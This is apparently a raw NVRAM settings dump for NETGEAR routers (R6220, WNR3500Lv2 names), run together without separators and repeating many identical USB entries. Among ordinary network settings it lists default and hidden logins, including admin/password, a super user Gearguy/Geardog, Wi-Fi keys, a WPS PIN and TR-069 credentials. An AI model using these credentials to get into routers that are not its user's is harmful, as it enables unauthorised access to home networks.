@1@USB_Storage;U:;0;0@usb_info_dev45=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_if_on4=0wan_vpi=0usb_info_dev99=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@ntp_custom=0usb_info_dev1=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev30=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@ftp_server_enable=0usb_info_dev75=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@upnp_ttl=4mail_enable=0ftp_server_wan_port=21wifi_if_on2=0fw_import=0wan_vci=38usb_info_dev61=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_def_key4=1wps_config_state=1wan_dslmode=MMODEstatic_if_status=1upnp_adv_time=30wifi_broadcast_ssid14=1ddns_use_wildcards=0rt_rip_version=0usb_info_dev0=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_key_len3=0wifi_allow_guest4=0fw_remote_port=8443usb_info_dev59=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@1:macaddr=01:23:45:67:89:abwifi_if_on1=1pppoe2_schedule_config=127:0:0:23:59wifi_ssid3=NETGEAR_Guest2wan_hwaddr_def=01:23:45:67:89:abport_forward_dis=0wifi_allow_guest3=0wl0_ssid=NETGEAR_11Gwifi_ssid12=NETGEAR-5G_Guestusb_info_dev31=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev15=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@qos_enable=0wifi_ssid13=NETGEAR-5G_Guest2lan_ifnames=eth1 eth2 eth3 eth4wifi_if_on13=0wifi_frag_thre=2346wifi_key_len14=0wifi_broadcast_ssid2=1wifi_dot11_mode1=9usb_info_dev54=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@ssidn=2fw_block_trust_enable=0usb_info_dev78=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@fw_block=0lan_proto=dhcpdhcp_end_ip=192.168.1.254usb_info_dev100=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev51=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_broadcast_ssid12=1wifi_dot11_iso1=0wifi_auth_type2=3usb_info_dev58=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wanif=eth0usb_info_dev38=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev26=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev35=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_allow_guest14=0usb_info_dev73=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_dot11_mode=8wifi_region1=Asiawifi_ssid14=NETGEAR-5G_Guest3wifi_mac=00:c0:02:11:22:33wan_encap=1usb_info_dev46=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@bs_trustedip_enable=0upnp_permission=enablefw_nat=1mail_sh_day=0wifi_present=1wiz_country=USfirstpageiswiz=1usb_info_dev92=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev85=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@popwindow=1wifi_wep_on3=0usb_info_dev93=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type1=3rip_multicast=1pppoa_idle=0ca_wsectype=wepwifi_wds1=0rt_rip_direction=bothusb_info_dev14=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@fw_acc_port=8080enable_igmp=0wifi_band=2port_trigger_timeout=20wifi_dot11_iso=0usb_info_dev76=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@pppoa_username=Guestwifi_radius_port=1812wan_pppoe_relay=0usb_info_dev17=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev84=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@2:macaddr=01:23:45:67:89:abwifi_allow_guest13=0wan_vpi_change=0fw_time_zone=GMTbusb_info_dev42=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@et0macaddr=01:23:45:67:89:abwifi_auth_type12=3lan_if=br0usb_info_dev33=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type4=3usb_info_dev98=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev97=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_rts_thre=2347log_gateway=1usb_info_dev56=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev25=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@ddns_enable=0usb_info_dev86=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev29=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev44=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_broadcast_ssid3=1wl_ssid=NETGEARwifi_def_key3=1usb_info_dev52=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wmm_enable=1wifi_wep_on2=0smb_server_enable=1wifi_access_control1=0usb_info_dev57=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@mail_portscan=1time_zone=0http_username=adminwan_mode=dhcpcrestore_defaults=0wan_ifname=eth0usb_info_dev47=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev22=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@blank_state=0wifi_access_control=0usb_info_dev36=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_def_key13=1mail_logfull=0ftp_server_wan_enable=0wifi_key_len2=0schedule_config=127:0:0:23:59mail_dos=1wifi_if_on=1usb_info_dev21=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wds_apmode=repeaterstorage_share_def=U:USB_Storage:-:0:0T:T_Drive:-:0:0S:S_Drive:-:0:0R:R_Drive:-:0:0http_server_wan_port=443mail_sh_hour=1usb_info_dev34=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_radius_port1=1812wifi_wep_on14=0pppoe_idle=0wifi_broadcast_ssid1=1storage_new_workgroup=Workgroupusb_info_dev69=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev5=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_key_len=0fw_acc_lan=0storage_allow_all=1wifi_broadcast_ssid13=1wifi_wep_on=0usb_info_dev40=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_key_len1=0wifi_auth_type14=3console_loglevel=1wifi_def_key12=1usb_info_dev27=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev9=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev74=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev12=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type13=3wifi_if_on3=0usb_info_dev55=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wep_on1=0usb_info_dev96=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_key_len12=0usb_info_dev13=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wep_on4=0log_block=1wifi_band1=2usb_info_dev41=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_ssid12_abgn=0restore_default=0usb_info_dev66=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_ssid2=NETGEAR_Guestwifi_enable_shortpreamble=1fw_dmz_enable=0fw_disable=00:macaddr=01:23:45:67:89:abwan_def_mac=00:c0:02:11:22:34wifi_region=Asiawifi_channel1=0wifi_wds=0usb_info_dev89=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev87=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev20=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev71=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@storage_machine_name=readysharewifi_broadcast_ssid4=1usb_info_dev94=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@fw_schedule=1111111:00:00-24:00usb_info_dev60=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@pro_count=0usb_info_dev3=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@snmp_enable=0usb_info_dev95=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_allow_guest2=0usb_info_dev72=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wds_apmode1=pointdhcp_server_enable=1wifi_ssid=NETGEARddns_service_provider=dyndnswifi_dome_off=0needfwcheck=1wifi_ssid12_bgn=0usb_info_dev90=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_if_on14=0wifi_def_key1=1wifi_key_len13=0mail_sendlog=2dis_sip_alg=0usb_info_dev49=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev91=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@log_login=1http_timeout=5usb_info_dev43=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev24=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev62=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@http_password=passwordlan_bipaddr=192.168.0.255usb_info_dev77=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type=3wifi_keep_wep_page=0usb_info_dev19=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_channel=0wifi_def_key=1http_server_enable=1log_dos=1usb_info_dev23=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev2=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wan_mtu=1500time_zone_x=0usb_info_dev82=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@fw_remote=0usb_info_dev39=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev18=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@dhcp_server_enable8=1dhcp_start_ip7=192.168.6.2pppoa_username3=Guestvoip_line1_ring_valid=disableusb_info_dev50=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@lan_netmask3=255.255.255.0qos_8021q_enable=enablepppoa_username7=Guestwan_mode2=dhcpcatm_mbs8=1200sip_line1_reg_port=5060atm_scr6=524288vlann=4atm_pcr8=524288prov_active_status=disablewan_dod2=1voip_atpm_key=#atm_qos7=ubratm_scr8=524288wan_mtu5=1458wifi_mac3=00:c0:02:12:35:94wan_fix_dns8=0wan_iptype6=Dynamicwan_dod6=1wan_iptype3=Dynamicfw_response_ping6=0prov_period_inteval=1440usb_info_dev4=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@lan_bipaddr4=192.168.3.255pppoe_mtu=1492wan_num=1wifi_mac4=00:c0:02:11:22:36pppoe_idle4=0atm_pcr3=524288pppoa_mtu3=1500atm_pcr4=524288voip_line2_pref_codec=0dhcp_end_ip7=192.168.6.254atm_scr5=524288pptp_present=0wan_mode4=dhcpcwan_mtu7=1458sip_line2_reg_port=5060pppoa_idle3=0wan_iptype2=Dynamicvoip_vad_enable=disablewan_mode6=dhcpcwan_fix_dns2=0qn=4dslmode_present=0lan_bipaddr2=192.168.1.255vlan_on=1voip_line2_ring_id=0pppoe_idle6=0fw_nat4=1lan_bipaddr8=192.168.7.255lan_netmask5=255.255.255.0wan_mtu2=1458fw_nat8=1usb_info_dev48=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@prov_tftp_secondary_port=2400qos_wmm_enable=enablepppoa_mtu4=1500atm_pcr=524288pppoe_idle5=0pppoa_idle4=0fw_nat6=1dhcp_start_ip2=192.168.1.2atm_qos2=ubratm_pcr6=524288wan_dod8=1wan_macaddr_def=52:54:00:12:34:56pppoe_idle8=0atm_mbs=1200dhcp_start_ip3=192.168.2.2dhcp_end_ip4=192.168.3.254atm_scr=524288pppoa_idle8=0atm_qos3=ubrdhcp_end_ip8=192.168.7.254iplist_enable=0atm_mbs6=1200pppoa_idle7=0fw_spi7=1wan_dod7=1fw_spi5=1wan_fix_dns7=0ifmap_lan=1,1,1,1ifmap_wifi=1,1,1,1atm_qos=ubrqn_max=6dhcp_server_enable5=1pstn_prefix=*ifmap_tr069=1pppoe_idle2=0atm_mbs7=1200wifi_broadcast_ssid=1ipoa_present=0atm_qos4=ubrusb_info_dev88=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@pppoa_idle2=0wan_iptype8=Dynamiclan_netmask=255.255.255.0sipalg_present=0pppoa_mtu=1500sip_line2_reg_expire=1200fw_response_ping3=0log_type=0portn=4voip_line1_pref_codec=0pvcn=3ifmap_present=0wan_fix_dns6=0fw_nat2=1sip_line1_proxy_port=5060fw_response_ping4=0sip_line2_reg_headstart=60usb_info_dev10=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@qos_prio_level=3;Low!2;Normal!1;High!0;Highestdhcp_start_ip=192.168.1.2fw_spi6=1voip_ld_timeout=5ethConver=1voip_line2_enable=disablewifi_mac2=62:c0:02:11:22:32wan_mtu4=1458atm_qos5=ubrpppoe_mtu3=1492lan_bipaddr7=192.168.6.255vlan_if=eth0voip_line1_ring_id=0dhcp_start_ip8=192.168.7.2dhcp_end_ip5=192.168.4.254dhcp_server_enable6=1sip_rtp_port=10000wan_iptype7=Dynamicgroupn=8voip_web_hidden=1dhcp_server_enable2=1voip_line1_enable=disablelan_netmask7=255.255.255.0pppoe_idle3=0qos_icmp_enable=disablewan_mode8=dhcpclan_netmask6=255.255.255.0sip_local_port=5060fw_remote_tftp=0fw_nat5=1pppoa_idle6=0voip_fd_timeout=20wan_mtu3=1458wan_iptype4=Dynamicatm_qos6=ubrfw_nat3=1lan_bipaddr5=192.168.4.255dhcp_server_enable4=1pppoe_mtu2=1492wan_fix_dns4=0wan_fix_dns5=0qos_icmp_queue=1voip_line2_pref_fax_codec=1atm_mbs2=1200fw_remote_type=3atm_mbs3=1200ifmap_enable=disableusb_info_dev80=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@qos_tos_mode=1wizard_present=0usb_info_dev81=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@pppoa_username5=Guestddns_wan_num=1voip_line2_ring_valid=disablevoip_line1_pref_fax_codec=1wan_mtu8=1458ifmap_dft=1dhcp_end_ip3=192.168.2.254dhcp_end_ip2=192.168.1.254wan_mode3=dhcpcvoip_pstn_enable=disablefw_response_ping2=0fw_response_ping5=0lan_bipaddr3=192.168.2.255qos_tos_enable=enablewiz_reboot=0atm_mbs4=1200prov_tftp_primary_port=69vlan_map=3,2,1,0atm_pcr7=524288fw_spi2=1sip_line1_reg_expire=1200atm_scr4=524288pstn_relay_enable=enablefw_response_ping8=0pppoa_username2=Guestpppoa_username4=Guestdhcp_start_ip6=192.168.5.2atm_mbs5=1200upgrade_default=0fw_spi3=1wan_fix_dns3=0wan_mtu6=1458atm_pcr5=524288fw_nat7=1voip_line1_anonymous_in=1fw_spi4=1sip_line1_reg_headstart=60telnet_active_status=0fw_spi8=1lan_bipaddr6=192.168.5.255wan_dod4=1pppoa_mtu2=1500group_map=VLAN1,SSID1,SSID2,SSID3,SSID4,5G_SSID1,5G_SSID2,5G_SSID3,5G_SSID4,WAN1:VLAN2,WAN2:VLAN3,WAN3:VLAN4::::pppoe_idle7=0atm_scr2=524288qos_sprio_table_4=0,3!1,4!2,4!3,3!4,2!5,2!6,1!7,1fwpt_df_count=0qos_sprio_table_3=0,3!1,4!2,2!3,1!4,3!5,3!6,3!7,3voip_line2_anonymous_in=1qos_sprio_table_info=1,TOS_PREC,ON,3,HIGH,0,7,8!2,TOS_DSCP,OFF,3,HIGH,0,63,0!3,WiFi_WMM,ON,3,OVERW,0,7,8!4,VLA8qos_sprio_table_1atm_qos8=ubrqos_dft_queue=2dhcp_server_enable3=1pppoa_username6=Guestatm_scr3=524288voip_si_time=0dhcp_start_ip4=192.168.3.2upnp_present=0wan_iptype5=Dynamicdhcp_end_ip6=192.168.5.254pppoa_idle5=0atm_scr7=524288wan_dod3=1lan_netmask4=255.255.255.0dhcp_server_enable7=1pppoe_username=guestaccess_control_mode=0wan_mode7=dhcpcsip_line2_proxy_port=5060vlan_mode=0pppoa_username8=Guestfw_response_ping7=0atm_pcr2=524288prov_tftp_default_port=69wan_mode5=dhcpcwan_dod5=1remote_wan_num=1lan_netmask8=255.255.255.0dhcp_start_ip5=192.168.4.2pppoe_mtu4=1492usb_info_dev65=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev64=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@lan_netmask2=255.255.255.0staWirelessMode=9tm_watermark=0HT_AMSDU=0HT_EXTCHA=1gd_down_task_num=3dhcpPriDns=10.10.10.251dhcpEnabled=1WscModeOption=0Key4Type=0start_in_blankstatenvram_get_buf:=blankl2tp_idletime=0tm_3g_ampm=amlog_fwd=1htpwd_recovery_time=0Password=adminwifi_wsc_uuid_hex=3883309230921883a955000000000000hsdpa_pdp_type=0wan_pptp_mode=0super_username=Gearguygd_up_speed=10NoForwardingBTNBSSID=0start_in_blankstate=1mail_ssl=0WdsEnable=0media_server_enable=0tm_3g_enable=0wan_pptp_ip=10.10.10.254BSSTxop=0;0;94;47WebInit=1HT_HTC=1qos_uplink_rate=512tm_enable=0tm_roundup_volumn=0iptv_br_lan2=0tm_3g_action_internet=0wifi_radius_rekey_secs=3600DisableOLBC=0BSSCwmin=4;4;3;2tm_3g_reset_day=1tm_start_time=0DLSCapable=0tm_reset_day=1CountryRegionABand=7HT_BW=1VLANPriority=0wan_pppoe_pass=pppoe_passwdWscUseUFD=0HT_MIMOPS=3PMKCachePeriod=10detect_hw_link=1wifi_rts_thre1=2347AckPolicy=0;0;0;0APSDCapable=0hsdpa_gui_vis=1dhcpStart=10.10.10.100Key2Type=0detect_retry_interval=30WdsEncrypType=NONEWmmCapable=1HT_MpduDensity=5WscConfMode=0MacFilterEnable=0wifi_ap_mode=0Key3Type=0detect_resume_time=30HT_RDG=1BSSACM=0;0;0;0HSCounter=0gd_enable=0wan_pptp_server=pptp_serverwifi_broadcast_ssid5=1wifi_ssid5=NETGEAR_Guest4iptv_br_wlan1=0HostName=ralinkRADIUS_Acct_Port=1813adslwan_mode_backup=dhcpchsdpa_isp=0apple_server_enable=1CountryRegion=5hsdpa_password=guestgd_refresh_rate=3tm_3g_action_led=0wan_reset_enable_pptp=0APCwmax=6;10;4;3wan_pptp_user=pptp_userAuthMode=OPENnatEnabled=1WscConfStatus=2l2tp_server=10.0.0.138wanConnectionMode=STATICAPCwmin=4;4;3;2DMZEnable=0EncrypType=NONEdetect_method=1wan_l2tp_netmask=255.255.255.0OperationMode=0wifi_dot11_iso4=0wifi_ap_name=R6220HT_OpMode=0NintendoCapable=0wan_secondary_dns=168.95.1.1WirelessEvent=0HideSSID=0tm_mtd_initd=0PortForwardEnable=0lang_user_select=0nat_filter=securitywan_account=R6220IPPortFilterEnable=0tm_3g_start_time=0refresh_times=0htpwd_recovery_enable=0hsdpa_access_num=1hsdpa_username=guestwan_l2tp_user=l2tp_userHT_40MHZ_INTOLERANT=0WscConfigured=0dhcpGateway=10.10.10.254HT_BSSCoexistence=1wifi_dot11_iso3=0TurboRate=0wifi_allow_guest5=0TxBurst=1qos_bw_sel=1wifi_key_len4=0BeaconPeriod=100gd_auto_refresh=0HT_PROTECT=1wifi_auth_type5=3PktAggregate=1hsdpa_autoconn=1SSID1=MT7620_APwan_l2tp_mode=0WscEncrypType=1session_timeout_interval=0PreAuth=0need_not_loginnvram_get_buf:=0WscAuthType=1wifi_psk_pwd1=1234567890idle_timeout_interval=0DtimPeriod=1brs_rus_wizard_used=0TxRate=0igmpEnabled=0iptv_br_lan1=0wifi_psk_pwd=1234567890WscKeyMGMT=WPA-EAPAccessPolicy0=0tm_3g_roundup_volumn=0wifi_frag_thre1=2346HT_STBC=1config_state=blankstatehsdpa_country=0tm_3g_poll_interval=10log_wlan=1AutoChannelSelect=0BSSAifsn=3;7;2;2HT_RxStream=2APACM=0;0;0;0TxPower=100wan_l2tp_pass=l2tp_passwdwan_l2tp_ip=10.10.10.254AccessPolicy1=0HT_TxStream=2WscRegResult=1AccessPolicy3=0tm_action_led=0pptpc_user=Guestdetect_hwlink_failtime=30l2tp_dod=1tm_reset_hour=0WscConfigMethod=138apcli_act_as_wan=1mail_notify=0wps_aplockdown_forceon=0product_name=R6220wifi_def_key5=1enable_guistringtable=1gd_down_speed=0wifi_mac1=00:c0:02:11:22:32wifi_radius_rekey_secs1=3600tm_reset_minute=00tm_3g_limit_by=0wifi_badge_led_enable=1WscActionIndex=9ParentalControl=0tm_3g_watermark=0lltdEnabled=0IEEE8021X=0WPAPSK1=12345678AccessPolicy2=0tm_3g_mtd_inited=0pptpc_idletime=0dhcpSecDns=168.95.1.1Channel=6pptpc_server=10.0.0.138BssidNum=1NoForwarding=0APTxop=0;0;94;47tm_action_internet=0BSSCwmax=10;10;4;3wps_mode1=enabledwps_config_state1=1wifi_button_ctl=0hsdpa_autoreconn=1tm_limit_dir=0wan_pptp_gateway=10.10.10.253wps_device_pin=12345670tm_limit_by=0wifi_coexist_enabled=1wifi_dot11_iso5=0wifi_schedule_on=0HT_AutoBA=1HT_MCS=33wan_primary_dns=10.10.10.251mail_ssl_port=25CSPeriod=6wifi_wsc_uuid_asc=38833092-3092-1883-a955-000000000000find_new_version=0wan_pptp_netmask=255.255.255.0pr_wiz_startingwan=0mt_3g_ant_internal=0en_ipmac_enable=0need_not_login=0wan_conn_method=1tm_3g_reset_hour=00RekeyInterval=3600wifi_super_wifi_enable=0Platform=MT7620iptv_br_lan4=0HT_BAWinSize=64WscSSID=RalinkInitialAPHT_BADecline=0DefaultKeyID=1HT_GI=1wifi_allow_guest12=0wan_reset_enable=0wifi_if_on5=0detect_retry_num=2wifi_ap_assign=dhcpcdhcpMask=255.255.255.0old_wan_mode=dhcpcwifi_key_len5=0qos_rate_unit=Kbpsgd_downmanage_auto=0VLANID=0wan_l2tp_gateway=10.10.10.253wifi_wep_on5=0IEEE80211H=0WirelessMode=9dhcpLease=86400ShortSlot=1wan_pppoe_user=pppoe_userlog_asites=1SecurityMode=0device_has_dongle_plugged=0TxPreamble=0super_password=GeardogDefaultFirewallPolicy=1media_server_name=ReadyDLNAHT_DisallowTKIP=1BasicRate=15RADIUS_Port=1812device_name=R6220WscAKMP=1wan_l2tp_server=l2tp_serverLogin=adminRekeyMethod=DISABLEAPAifsn=3;7;1;1iptv_br_lan3=0fw_service_block=0WscUseUPnP=1BGProtection=0dhcpEnd=10.10.10.200hsdpa_idletime=0stpEnabled=0wifi_ap_dns_assign=dynamicKey1Type=0tm_poll_interval=10VLANEnable=0wan_pptp_pass=pptp_passwdapcli_resetwlan_enable=1HT_LinkAdapt=0RTSThreshold=2347FragThreshold=2346tm_ampm=amWscNewKey=scaptestwps_mode=enabledtm_3g_reset_minute=00wifi_dot11_iso2=0tm_3g_limit_dir=0media_server_scan=1tm_mtd_inited=0tm_limit_time=0tm_limit_volumn=0wla_keyBit=0os_date=Feb 7 2018syslog_localDisplayLevel=3wla_temp_mode=145Mbpsppp0_ip_ext_enable=0pppoa_dod=0wan_dns_sel=0bs_trustedip_temp=192.168.1.0wla_repeater=0wla_wds_pmp_sta=1software_version_bak=1.0pppoe_mru=1492syslog_option=1upnp_advert_period=30wl0_wps_config_state=0fw_rsp_ping=0ver_type=WWpppoa_max_echo_fail=3wla_frag=2346wan0_proto_enable_0=1str_tbl_en=1bs_enable_temp=0traffic_warning_state=0wan_ipaddr=0.0.0.0ppp0_to_bridge=0ppp0_remote_ip=0.0.0.0http_rmport=8443usb_wan_ftp_pasv_port_start=30001cpe_productclass=Netgearfw_dmz_enab=0wla_temp_defaKey=0cpe_dl_surl=-traffic_led_enable=0preferredDns=0.0.0.0wps_lan_led=0wla_channel=0wla_ssidIdx=1wl0_radio=1fw_email_send_all=0wla_region=5Te_test_flag=0upnp_advert_ttl=4cpe_status=normalddns_wildcard=0ppa0_to_bridge=0cpe_cmdkey=-wla_temp_setting_3=0wan_ipconn_name=dhcpsyslog_serverPort=514wan_hwaddr_sel=0cpe_parattr=InternetGatewayDevice.ManagementServer.URL:2:0wla_txPwrPcnt=100country=USAwla_wpaGTKRekey=0wan0_encapMode=0ppa0_static_ip=0ver_check_ftp_password=WNR3500U@local_ip2=0.0.0.0wla_rate=0qos_bw_min_3=1000000upnp_portmap_entry=0wan_netmask=0.0.0.0wla_ssid_bc_3=1wla_temp_ssid_3=NETGEAR-Guest2lanip_changed=0traffic_enable=0wps_timeout_enable=0sel_region=0wla_csScanTimer=0wla_radius_port=1812usb_shareport=21usb_wan_http_enable=0manufacturer_OUI=0014BFsmb_host_name=readysharewla_basicRate=defaultlocal_ip1=0.0.0.0wl_unit=0traffic_volume_ctrl_dir=0ipoa_gateway=0.0.0.0et1macaddr=00:FF:FF:FF:FF:FFlan_stp=1wanipaddr_bak=olddhcp_start=192.168.1.2wla_wds_ptp_sta=1http_rmstartip=0.0.0.0ppa0_idle_timeout=300wla_radius_server=0.0.0.0ipa0_ip_addr=0.0.0.0bpa_debug_level=1atmVcc0_tdid=0wan_proto=dhcpcpe_password=plugfestwla_temp_ssid_4=NETGEAR-Guest3friendly_name=WNR3500Lv2atmTd0_maxBurstSize=0ver_check_ftp_username=anonymousis_default=1lan1_lease=86400nowchoice=0qos_l7_apps=5:3 6:3 3:0 2:0 4:0 1:0traffic_restart_hour=00wl0_preauth=0lan1_netmask=255.255.255.0traffic_restart_day=1wl0_wps_reg=enabledwan0_connId=1cpe_periodicinform_enable=1wl0_hwaddr=00:FF:FF:FF:FF:FFwla_disableWme=0WandataDirIndex=1logo_enable=0potMaxValue=4320wan0_enable=1wan_ipaddr_old=0.0.0.0usb_wan_ftp_port=21potValue=0ppp0_netmask=0.0.0.0cpe_username=plugfestping_NOrepetitions=2ipsrv0_ip_mask=0.0.0.0local_ip7=0.0.0.0lan_upnp_wfa_subc_num=0wl_wps_mode=enabledwla_wep_length=0ipsrv0_ip_addr=0.0.0.0pppoe_ifname=ppp0usb_umount=0log_level=0wla_nProtection=autowla_netReauth=36000ver_check_ftp_svr2=updates1.netgear.comver_check_ftp_svr1=updates1.netgear.comwla_dfsPreIsm=60system_name=WNR3500Lv2wan0_nat_enable=1fwpt_enable=1ppa0_auth_method=0lan1_ipaddr=192.168.2.1wan0_vlan_id=1cpe_dl_start=-lang_check_config_file_name=stringtable.txtwan_unit=0gui_check_enable=1usb_dev_no_change=0wla_auth_type_2=automaticpptp_serv_ip=10.0.0.138fw_bks_block_type=0qos_bw_max_0=128000wla_amsdu=offwlan_acl_enable=0wla_wmeApsd=1pppoa_localip=0.0.0.0rm_access=allfw_sip_enab=1lan1_stp=1pppoa_idletime=300usb_wan_ftp_enable=0wla_acl=DisableatmTd0_sustainedCellRate=0traffic_warning_time=0wla_temp_defaKey_4=0ppa0_ip_ext_enable=0traffic_block_enable=0wps_sta_pin=00000000cpe_bootstrap=0wla_sec_profile_name_3=NETGEAR2usb_ftp_enable=0acs_url2=http://172.19.139:1234usb_http_enable=1ppp0_debug=0acs_username=admin48=fab2wan_lease=86400syslog_status=0wl_macmode=disabledwan_primary=0schedule_daylightadjust=0wla_temp_isolation=0traffic_control_type=0fw_email_pid=-1upgrade_enable=1wiz_pppoe_wait_time=5wla_wds_mode=1wla_wep_length_4=0atmVcc0_dsl_mode=0fw_dmz_ip4=2wla_temp_setting_4=0wla_ssid_3=NETGEAR-Guest2ping_datablocksize=42traffic_restart_min=00wla_auth_type=automaticipoa_ipaddr=0.0.0.0pppoe_session_id=0traffic_restart_ampm=0wl_key=1diagnostic_state=Nonepppoa_ifname=ppp0wl_wps_config_state=0cpe_devname=ADSLsmb_enable=1gui_region=Englishdhcp_mode=manualwsc_pin_disable=0wla_enbl_1=0acs_url_bak=http://10.10.10.10:9999fw_spi_enab=1wps_device_name=WNR3500Lv2local_ip3=0.0.0.0enable_gui_str_tbl=1wla_mode=300Mbpsrouter_disable=0usb_wan_ftp_pasv_port_end=30050wla_protection=autowps_config_method=0x2688wla_defaKey=0usb_disk_max_part=15wps_aplockdown_cap=1pppoa_keepalive=1lang_check_ftp_svr=updates1.netgear.comqos_bw_uplink=256000wps_aplockdown_ageout=31536000boardnum=2200pppoa_echo_interval=30ipsrv0_ip_gateway=0.0.0.0usb_wan_http_port=443acs_provisioncode=-boot_wait=offevent_method=M 